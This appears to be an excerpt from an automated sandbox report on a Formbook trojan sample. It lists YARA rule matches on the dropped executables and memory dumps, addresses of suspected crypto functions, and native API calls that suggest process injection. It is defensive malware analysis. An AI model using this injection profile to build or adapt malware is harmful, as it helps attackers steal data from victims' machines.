Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: bstkiooen.exe PID: 3092, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 4024, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6848E	0_2_00C6848E
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C76CDC	0_2_00C76CDC
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C640FE	0_2_00C640FE
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C74088	0_2_00C74088
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C700B7	0_2_00C700B7
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C851C9	0_2_00C851C9
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C77153	0_2_00C77153
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C762CA	0_2_00C762CA
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C632F7	0_2_00C632F7
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C743BF	0_2_00C743BF
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C8D440	0_2_00C8D440
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6F461	0_2_00C6F461
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6C426	0_2_00C6C426
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C777EF	0_2_00C777EF
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C8D8EE	0_2_00C8D8EE
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6286B	0_2_00C6286B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C919F4	0_2_00C919F4
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6E9B7	0_2_00C6E9B7
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C73E0B	0_2_00C73E0B
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C6EFE2	0_2_00C6EFE2
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C84F9A	0_2_00C84F9A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD0227	1_2_00BD0227
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01711D55	2_2_01711D55
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01640D20	2_2_01640D20
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01664120	2_2_01664120
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164F900	2_2_0164F900
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165D5E0	2_2_0165D5E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701002	2_2_01701002
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165841F	2_2_0165841F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B090	2_2_0165B090
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167EBB0	2_2_0167EBB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01666E30	2_2_01666E30
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041DAE4	2_2_0041DAE4
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041E544	2_2_0041E544
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041ED4C	2_2_0041ED4C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00409E5B	2_2_00409E5B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00409E60	2_2_00409E60
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_00402FB0	2_2_00402FB0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: String function: 00C7F5F0 appears 31 times
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: String function: 00C7EB78 appears 39 times
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: String function: 00C7EC50 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: String function: 0164B150 appears 32 times

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD043D GetTempFileNameW,NtSetInformationFile,NtWriteFile,CreateProcessInternalW,GetThreadContext,SetThreadContext,GetThreadContext,	1_2_00BD043D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 1_2_00BD07DF NtOpenFile,	1_2_00BD07DF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689540 NtReadFile,LdrInitializeThunk,	2_2_01689540
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_01689910
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016895D0 NtClose,LdrInitializeThunk,	2_2_016895D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016899A0 NtCreateSection,LdrInitializeThunk,	2_2_016899A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01689860
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689840 NtDelayExecution,LdrInitializeThunk,	2_2_01689840
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016898F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_016898F0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689710 NtQueryInformationToken,LdrInitializeThunk,	2_2_01689710
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016897A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_016897A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689780 NtMapViewOfSection,LdrInitializeThunk,	2_2_01689780
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_01689660
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A50 NtCreateFile,LdrInitializeThunk,	2_2_01689A50
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A20 NtResumeThread,LdrInitializeThunk,	2_2_01689A20
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01689A00
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016896E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_016896E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689560 NtWriteFile,	2_2_01689560
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689950 NtQueueApcThread,	2_2_01689950
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689520 NtWaitForSingleObject,	2_2_01689520
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168AD30 NtSetContextThread,	2_2_0168AD30
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016895F0 NtQueryInformationFile,	2_2_016895F0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016899D0 NtCreateProcessEx,	2_2_016899D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168B040 NtSuspendThread,	2_2_0168B040
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689820 NtEnumerateKey,	2_2_01689820
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016898A0 NtWriteVirtualMemory,	2_2_016898A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689760 NtOpenProcess,	2_2_01689760
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689770 NtSetInformationFile,	2_2_01689770
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168A770 NtOpenThread,	2_2_0168A770
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689730 NtQueryVirtualMemory,	2_2_01689730
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689B00 NtSetValueKey,	2_2_01689B00
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168A710 NtOpenProcessToken,	2_2_0168A710
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689FE0 NtCreateMutant,	2_2_01689FE0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168A3B0 NtGetContextThread,	2_2_0168A3B0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689670 NtQueryInformationProcess,	2_2_01689670
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689650 NtQueryValueKey,	2_2_01689650
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689610 NtEnumerateValueKey,	2_2_01689610
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A10 NtQuerySection,	2_2_01689A10
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016896D0 NtCreateKey,	2_2_016896D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01689A80 NtOpenDirectoryObject,	2_2_01689A80
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A360 NtCreateFile,	2_2_0041A360
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A410 NtReadFile,	2_2_0041A410
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A490 NtClose,	2_2_0041A490
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A540 NtAllocateVirtualMemory,	2_2_0041A540
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A35A NtCreateFile,	2_2_0041A35A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A3B2 NtCreateFile,	2_2_0041A3B2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A40A NtReadFile,	2_2_0041A40A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A48B NtClose,	2_2_0041A48B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0041A53A NtAllocateVirtualMemory,	2_2_0041A53A

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C66FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00C66FAA

PE file does not import any functions

Source: F61A.tmp.1.dr

Static PE information: No import functions for PE file found

Tries to load missing DLLs

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
